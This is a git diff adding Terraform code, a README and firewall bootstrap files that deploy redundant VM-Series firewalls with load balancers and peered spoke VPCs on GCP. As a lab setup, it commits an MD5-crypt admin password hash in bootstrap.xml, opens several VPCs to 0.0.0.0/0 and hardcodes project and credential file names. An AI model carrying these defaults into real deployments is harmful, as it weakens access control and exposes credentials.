"ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" // default "" - runs no startup script + + internal_lb_create = true // default false + internal_lb_name = "spoke1-intlb" // default "intlb" + internal_lb_ports = ["80", "443"] // default ["80"] + internal_lb_ip = "10.10.1.100" // default "" (assigns an any available IP in subnetwork ) + + providers = { + google = "google.spoke1" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE1-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "spoke1-to-trust" + network = "${module.vpc_spoke1.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.trust_to_spoke2", + ] + provider = "google.spoke1" +} diff --git a/gcp/adv_peering_2fw_2spoke/spoke2.tf b/gcp/adv_peering_2fw_2spoke/spoke2.tf new file mode 100644 index 00000000..718ff170 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/spoke2.tf @@ -0,0 +1,55 @@ +provider "google" { + credentials = "${var.spoke2_project_authfile}" + project = "${var.spoke2_project}" + region = "${var.region}" + alias = "spoke2" +} + 
+#************************************************************************************ +# CREATE SPOKE2 VPC & SPOKE2 VM +#************************************************************************************ +module "vpc_spoke2" { + source = "./modules/create_vpc/" + vpc_name = "spoke2-vpc" + subnetworks = ["spoke2-subnet"] + ip_cidrs = ["10.10.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke2" + } +} + +module "vm_spoke2" { + source = "./modules/create_vm/" + vm_names = ["spoke2-vm1"] + vm_zones = ["${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = "ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke2.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + + providers = { + google = "google.spoke2" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE2-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "spoke2-to-trust" + network = "${module.vpc_spoke2.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke1_to_trust", + ] + provider = "google.spoke2" +} diff --git a/gcp/adv_peering_2fw_2spoke/variables.tf b/gcp/adv_peering_2fw_2spoke/variables.tf new file mode 100644 index 00000000..f273131f --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/variables.tf @@ -0,0 +1,65 @@ +#************************************************************************************ +# GCP VARIABLES +#************************************************************************************ +variable "region" { + default = "us-east4" +} + +#************************************************************************************ +# main.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "main_project" { + description = "Existing project ID for main project (all resources deployed in main.tf)" + default = "host-project-242119" +} + +variable "main_project_authfile" { + description = "Authentication file for main project (all resources deployed in main.tf)" + default = "host-project-b533f464016c.json" +} + +#************************************************************************************ +# spoke1.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "spoke1_project" { + description = "Existing project for spoke1 (can be the same as main project and can be same as main project)." + default = "host-project-242119" +} + +variable "spoke1_project_authfile" { + description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)" + default = "host-project-b533f464016c.json" +} + +#************************************************************************************ +# spoke2.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "spoke2_project" { + description = "Existing project for spoke2 (can be the same as main project and can be same as main project)." 
+ default = "host-project-242119" +} + +variable "spoke2_project_authfile" { + description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf and can be same as main project)" + default = "host-project-b533f464016c.json" +} + +#************************************************************************************ +# VMSERIES SSH KEY & IMAGE (not required if bootstrapping) +#************************************************************************************ +variable "vmseries_ssh_key" { + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDa7UUo1v42jebXVHlBof9E9GAFfalTndZQmvlmFu9e88euqrLI4xEZwg9ihwPFVTXOmrAogye6ojv5rbf3f13ZFYB+USjcR/9RFX+DKkPmXluC5Xq3z0ZlxY3QETHSlr6G8pfEqNwFebYJmKZ1MVNUztmb1DTIhjbFN4IAK/8NzQTbOYnEbXV4BB9E9Xe7dtuDuQrgaoII7KITnYdY4tjI10/K01Ay52PC7eISvZBRZntto2Mg1WjWQAwyIJHFC8nXoE04Wbzv91ohLfs/Og/dSOhdFymX1KVx5XSZWZ0POEOFY3rsDHFDrMiZIxipfuvBtEsznExp7ybkIDtWOxNX admin" +} + +#************************************************************************************ +# UBUNTU SSH KEY +#************************************************************************************ +variable "ubuntu_ssh_key" { + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDk7y0D0Rz4F5J9Lu7gtTRTaEkJdWNLpmnDXcvHvaNC3euQ0KITIU6XaPHlXiB1M8pCrmBw3CFkFLxnPoGHrcN39wi2BR9d6Y1piz1v0gJqbggdMloSnrz51OVPqqC5BjtN/lB9hTcyNrh4MDfv37sRChHJb31s934vbj+qeiR16ZeLHH5moRXnyuzIvVUePnXHZvYz0M+YxJtvf806cz+Dvio72Y5g69/DUWReTNZ3h51MKseYMJT0Uu7mPJUZlH+xURc8zzzFazTE1jD7qL2z497si7oVHzmHm5nCECNayore3jzp5YYQkzEfe2fujxeM4UGlEBYuMkUxlH8QV5qN ubuntu" +} + +variable "vmseries_image" { + # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814" + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814" + # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814" +} diff --git a/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf new file mode 100644 index 00000000..ef6db3f1 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf differ diff --git a/gcp/adv_peering_2fw_2spoke_common/README.md b/gcp/adv_peering_2fw_2spoke_common/README.md new file mode 100644 index 00000000..0ac8b6bc --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/README.md @@ -0,0 +1,59 @@ +# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VPCs + +Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to internal load balancers in the trust VPC. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf) for more information. + +
+![Topology diagram](images/diagram.png) +
+ + +## Prerequisites +* Valid GCP account with an existing project +* Access to GCP Cloud Terminal or to a machine with Terraform 0.12 installed + +
+ +## How to Deploy +### 1. Setup & Download Build +In your project, open GCP Cloud Terminal and run the following. +``` +$ gcloud services enable compute.googleapis.com +$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo +$ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_2fw_2spoke_common +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and edit variables (lines 1-4) to match your Project ID, SSH Key (from step 1), and VM-Series type. + +``` +$ vi terraform.tfvars +``` + +

+Your terraform.tfvars should look like this before proceeding: +![terraform.tfvars example](images/tfvars.png) + +

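As a stand-in for the screenshot, here is a minimal sketch of such a terraform.tfvars. Only `public_key_path`, `fw_image`, and `fw_panos` are variable names visible in this change (fw_common.tf); `project_id` and every value shown are illustrative placeholders, so keep the variable names and values already present in the file you are editing.

```
project_id      = "<your-gcp-project-id>"   # illustrative variable name for the project ID
public_key_path = "~/.ssh/gcp-demo.pub"     # public key generated in step 1
fw_image        = "<vmseries-image>"        # VM-Series licensing type (BYOL/bundle), placeholder value
fw_panos        = "<panos-version>"         # PAN-OS version suffix, placeholder value
```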
+ +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
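When the apply completes, Terraform prints the outputs declared later in this change in fw_common.tf; they look roughly like the sketch below (all addresses and the key path are placeholders):

```
EXT-LB        = http://<external-lb-address>
MGMT-FW1      = https://<fw1-mgmt-public-ip>
MGMT-FW2      = https://<fw2-mgmt-public-ip>
SSH-TO-SPOKE1 = ssh <spoke-user>@<fw-untrust-public-ip> -p 221 -i <private-key-path>
SSH-TO-SPOKE2 = ssh <spoke-user>@<fw-untrust-public-ip> -p 222 -i <private-key-path>
```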
+ +## How to Destroy +Run the following to destroy the build and remove the SSH key created in step 1. +``` +$ terraform destroy +$ rm ~/.ssh/gcp-demo* +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..5391083c --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml @@ -0,0 +1,1065 @@ + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDbHV3bGJ4c0Q3QUNFdHYvSVR3R2llSlRqWFpGTjR6QnhGb2ZZdlRVR1RRZ1plU0M5c2RFbHFZdlhIZGRHdnNOVWhON2lLQTdjb2dMTnJGa3R5aXVDZWFlMk9jeXVCNXJ4UXY1YzdCSVZrMlFuMkpaWDNYa2lyS1hBN0NOZUNUWllibFN6dExpbTkzTENPR0FhMG0zYS9oTXVWbGlpM3FrTU1NbUhmakoxQ2trc1NmdkpUL1BLb3c2eFpkVS9Kem5lSThsNVhSeTdUc0NZU1ovdVdOa21IWDdibDV4WFpPdEZOOEExU0wrRWFUU3ZHQ2ZNMlNLNm5wSEZRK1RCek5adFh2YmxLcWtJQWJhZkhuSXI1TWFEQ1BhVUgyc1B3YXY1V2syOU1idmh3cHZEeXVLaERkR3U3WkExOTlKUDNrUXc5U3pva2diTEU1V1EyRHI2cnBBQ3YgZ2NwLWRlbW8= + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + no + + + no + + + no + + + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 35.191.0.0/16 + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.1.0.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + 
+ ethernet1/2 + 10 + 10.2.0.0/24 + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + + + + + + + + + loopback.1 + ethernet1/2 + + + + + + + ethernet1/1 + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + vlan + loopback + tunnel + + + + gcp-common-vr + + + + + + + + + + + 221 + + + + + + + + + + 222 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + service-http + service-https + + + any + + no + yes + allow + panorama + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + service-tcp-221 + service-tcp-222 + + + any + + no + yes + allow + no + If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. + panorama + + + + trust + + + trust + + + gcp-health-probes + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + universal + yes + panorama + + + + trust + + + trust + + + spoke1-vpc + spoke2-vpc + + + spoke1-vpc + spoke2-vpc + + + any + + + any + + + any + + + application-default + + + any + + allow + panorama + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + apt-get + ssl + web-browsing + + + application-default + + + any + + no + yes + allow + no + panorama + + + + + + + deny + no + yes + panorama + + + deny + no + yes + panorama + + + + + + + + + + + + + + + + + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-tcp-222 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + no + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-tcp-221 + ipv4 + ethernet1/1 + + spoke1-vm + 22 + + no + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-http + ipv4 + ethernet1/1 + + spoke1-intlb + 80 + + + + + trust + + + trust + + + gcp-health-probes + + + any + + any + ethernet1/2 + + loopback-interface + + No NAT on GCP LB health check. + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + ipv4 + + + + + + + + + + + + + +
+ + 130.211.0.0/22 + + gcp-resource + + + + 35.191.0.0/16 + + gcp-resource + + + + 100.64.0.1 + + gcp-resource + + Loopback interface for GLB healthcheck + + + 10.1.0.100 + + gcp-resource + + + + 10.1.0.2 + + gcp-resource + + + + 10.1.0.0/24 + + gcp-resource + + + + 10.2.0.2 + + gcp-resource + + + + 10.2.0.0/24 + + gcp-resource + + +
+ + + + gcp-health-probe-1 + gcp-health-probe-2 + + + gcp-resource + + + + + + + + + + + + color20 + + + color13 + + + color24 + + + color3 + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+ + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + * + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDbHV3bGJ4c0Q3QUNFdHYvSVR3R2llSlRqWFpGTjR6QnhGb2ZZdlRVR1RRZ1plU0M5c2RFbHFZdlhIZGRHdnNOVWhON2lLQTdjb2dMTnJGa3R5aXVDZWFlMk9jeXVCNXJ4UXY1YzdCSVZrMlFuMkpaWDNYa2lyS1hBN0NOZUNUWllibFN6dExpbTkzTENPR0FhMG0zYS9oTXVWbGlpM3FrTU1NbUhmakoxQ2trc1NmdkpUL1BLb3c2eFpkVS9Kem5lSThsNVhSeTdUc0NZU1ovdVdOa21IWDdibDV4WFpPdEZOOEExU0wrRWFUU3ZHQ2ZNMlNLNm5wSEZRK1RCek5adFh2YmxLcWtJQWJhZkhuSXI1TWFEQ1BhVUgyc1B3YXY1V2syOU1idmh3cHZEeXVLaERkR3U3WkExOTlKUDNrUXc5U3pva2diTEU1V1EyRHI2cnBBQ3YgZ2NwLWRlbW8= + + + + yes + 8 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + auth + All Logs + yes + + + data + All Logs + yes + + + threat + All Logs + yes + + + traffic + All Logs + yes + + + tunnel + All Logs + yes + + + url + All Logs + yes + + + wildfire + All Logs + yes + + + + + + +
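Taken together, the authcodes file above, this bootstrap.xml, and the init-cfg.txt that follows form the VM-Series bootstrap package. The gcp_bootstrap module later in this change uploads them into a storage bucket using the standard four-folder layout, creating empty placeholder objects for folders that receive no files; a sketch:

```
gs://<bootstrap-bucket>/
  config/     init-cfg.txt, bootstrap.xml
  content/    (empty placeholder object)
  license/    authcodes
  software/   (empty placeholder object)
```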
diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/fw_common.tf b/gcp/adv_peering_2fw_2spoke_common/fw_common.tf new file mode 100644 index 00000000..bff4b839 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/fw_common.tf @@ -0,0 +1,131 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for firewalls +module "bootstrap_common" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-common" + file_location = "bootstrap_files/" + config = ["init-cfg.txt", "bootstrap.xml"] + license = ["authcodes"] +} + +#----------------------------------------------------------------------------------------------- +# Create firewalls +module "fw_common" { + source = "./modules/vmseries/" + names = var.fw_names_common + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [ + module.vpc_untrust.subnetwork_self_link[0], + module.vpc_mgmt.subnetwork_self_link[0], + module.vpc_trust.subnetwork_self_link[0] + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_common.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + create_instance_group = true + + dependencies = [ + module.bootstrap_common.completion, + ] +} + +module "lb_inbound" { + source = "./modules/lb_tcp_external/" + region = var.regions[0] + name = var.extlb_name + service_port = 80 + instances = module.fw_common.vm_self_link + providers = { + google = google-beta + } +} + +#----------------------------------------------------------------------------------------------- +# Create 2 internal load balancers. LB-1 is A/A for internet. LB-2 is A/P for e-w. +module "lb_outbound" { + source = "./modules/lb_tcp_internal/" + name = var.intlb_name + subnetworks = [module.vpc_trust.subnetwork_self_link[0]] + all_ports = true + ports = [] + health_check_port = "22" + network = module.vpc_trust.vpc_id + + backends = { + "0" = [ + { + group = module.fw_common.instance_group[0] + failover = false + }, + { + group = module.fw_common.instance_group[1] + failover = false + } + ] + "1" = [ + { + group = module.fw_common.instance_group[0] + failover = false + }, + { + group = module.fw_common.instance_group[1] + failover = true + } + ] + } + providers = { + google = google-beta + } +} + + +#----------------------------------------------------------------------------------------------- +# Create routes route to internal LBs. Routes will be exported to spokes via GCP peering. 
+resource "google_compute_route" "default" { + name = "${var.intlb_name}-default" + dest_range = "0.0.0.0/0" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.lb_outbound.forwarding_rule[0] + priority = 99 + provider = google-beta +} + +resource "google_compute_route" "eastwest" { + name = "${var.intlb_name}-eastwest" + dest_range = "10.0.0.0/8" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.lb_outbound.forwarding_rule[1] + priority = 99 + provider = google-beta +} + + +#----------------------------------------------------------------------------------------------- +# Outputs to terminal +output EXT-LB { + value = "http://${module.lb_inbound.forwarding_rule_ip_address}" +} + +output MGMT-FW1 { + value = "https://${module.fw_common.nic1_public_ip[0]}" +} + +output MGMT-FW2 { + value = "https://${module.fw_common.nic1_public_ip[1]}" +} + +output SSH-TO-SPOKE1 { + value = "ssh ${var.spoke_user}@${module.fw_common.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}" +} + +output SSH-TO-SPOKE2 { + value = "ssh ${var.spoke_user}@${module.fw_common.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}" +} diff --git a/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf b/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf new file mode 100644 index 00000000..075033ef --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf @@ -0,0 +1,35 @@ +#----------------------------------------------------------------------------------------------- +# Create firewall VPCs & subnets +module "vpc_mgmt" { + source = "./modules/vpc/" + + vpc = var.mgmt_vpc + subnets = var.mgmt_subnet + cidrs = var.mgmt_cidr + regions = var.regions + allowed_sources = var.mgmt_sources + allowed_protocol = "TCP" + allowed_ports = ["443", "22"] +} + +module "vpc_untrust" { + source = "./modules/vpc/" + + vpc = var.untrust_vpc + subnets = var.untrust_subnet + cidrs = var.untrust_cidr + regions = var.regions + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/vpc/" + + vpc = var.trust_vpc + subnets = var.trust_subnet + cidrs = var.trust_cidr + regions = var.regions + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/images/diagram.png b/gcp/adv_peering_2fw_2spoke_common/images/diagram.png new file mode 100644 index 00000000..be6e973b Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/images/diagram.png differ diff --git a/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png b/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png new file mode 100644 index 00000000..28539794 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png differ diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf new file mode 100644 index 00000000..a93e7956 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf @@ -0,0 +1,85 @@ +locals { + bucket_name = join("", [var.bucket_name, random_string.randomstring.result]) +} +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = local.bucket_name + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = length(var.config) > 0 ? 
length(var.config) : "0" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_full" { + count = length(var.content) > 0 ? length(var.content) : "0" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_full" { + count = length(var.license) > 0 ? length(var.license) : "0" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_full" { + count = length(var.software) > 0 ? length(var.software) : "0" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "config_empty" { + count = length(var.config) == 0 ? 1 : 0 + name = "config/" + content = "config/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_empty" { + count = length(var.content) == 0 ? 1 : 0 + name = "content/" + content = "content/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_empty" { + count = length(var.license) == 0 ? 1 : 0 + name = "license/" + content = "license/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_empty" { + count = length(var.software) == 0 ? 
1 : 0 + name = "software/" + content = "software/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "null_resource" "dependency_setter" { + depends_on = [ + google_storage_bucket.bootstrap, + google_storage_bucket_object.config_full, + google_storage_bucket_object.content_full, + google_storage_bucket_object.license_full, + google_storage_bucket_object.software_full, + google_storage_bucket_object.config_empty, + google_storage_bucket_object.content_empty, + google_storage_bucket_object.license_empty, + google_storage_bucket_object.software_empty, + ] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf new file mode 100644 index 00000000..ef7f162d --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf @@ -0,0 +1,8 @@ +output completion { + value = null_resource.dependency_setter.id +} + +output bucket_name { + value = google_storage_bucket.bootstrap.name +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf new file mode 100644 index 00000000..0db2b8fd --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf @@ -0,0 +1,24 @@ +variable bucket_name { +} + +variable file_location { +} + +variable config { + type = list(string) + default = [] +} + +variable content { + type = list(string) + default = [] +} + +variable license { + type = list(string) + default = [] +} + +variable software { + default = [] +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf new file mode 100755 index 00000000..cc717264 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf @@ -0,0 +1,39 @@ + +locals { + health_check_port = var.health_check["port"] +} + +resource "google_compute_forwarding_rule" "default" { + project = var.project + name = var.name + target = google_compute_target_pool.default.self_link + load_balancing_scheme = "EXTERNAL" + port_range = var.service_port + region = var.region + ip_address = var.ip_address + ip_protocol = var.ip_protocol +} + +resource "google_compute_target_pool" "default" { + project = var.project + name = var.name + region = var.region + session_affinity = var.session_affinity + instances = var.instances + health_checks = var.disable_health_check ? [] : [google_compute_http_health_check.default.0.self_link] +} + +resource "google_compute_http_health_check" "default" { + count = var.disable_health_check ? 0 : 1 + project = var.project + name = "${var.name}-hc" + + check_interval_sec = var.health_check["check_interval_sec"] + healthy_threshold = var.health_check["healthy_threshold"] + timeout_sec = var.health_check["timeout_sec"] + unhealthy_threshold = var.health_check["unhealthy_threshold"] + + port = local.health_check_port == null ? 
var.service_port : local.health_check_port + request_path = var.health_check["request_path"] + host = var.health_check["host"] +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf new file mode 100644 index 00000000..0ab49899 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf @@ -0,0 +1,7 @@ +output forwarding_rule { + value = google_compute_forwarding_rule.default.*.self_link +} + +output forwarding_rule_ip_address { + value = google_compute_forwarding_rule.default.ip_address +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf new file mode 100644 index 00000000..2fc153ae --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf @@ -0,0 +1,70 @@ + +variable project { + type = string + description = "The project to deploy to, if not set the default provider project is used." + default = "" +} + +variable region { + type = string + description = "Region used for GCP resources." +} + +variable name { + type = string + description = "Name for the forwarding rule and prefix for supporting resources." +} + +variable service_port { + type = number + description = "TCP port your service is listening on." +} + +variable session_affinity { + type = string + description = "How to distribute load. Options are `NONE`, `CLIENT_IP` and `CLIENT_IP_PROTO`" + default = "NONE" +} + +variable disable_health_check { + type = bool + description = "Disables the health check on the target pool." + default = false +} + +variable health_check { + description = "Health check to determine whether instances are responsive and able to do work" + type = object({ + check_interval_sec = number + healthy_threshold = number + timeout_sec = number + unhealthy_threshold = number + port = number + request_path = string + host = string + }) + default = { + check_interval_sec = null + healthy_threshold = null + timeout_sec = null + unhealthy_threshold = null + port = null + request_path = null + host = null + } +} + +variable ip_address { + description = "IP address of the external load balancer, if empty one will be assigned." + default = null +} + +variable ip_protocol { + description = "The IP protocol for the frontend forwarding rule: TCP, UDP, ESP, AH, SCTP or ICMP." 
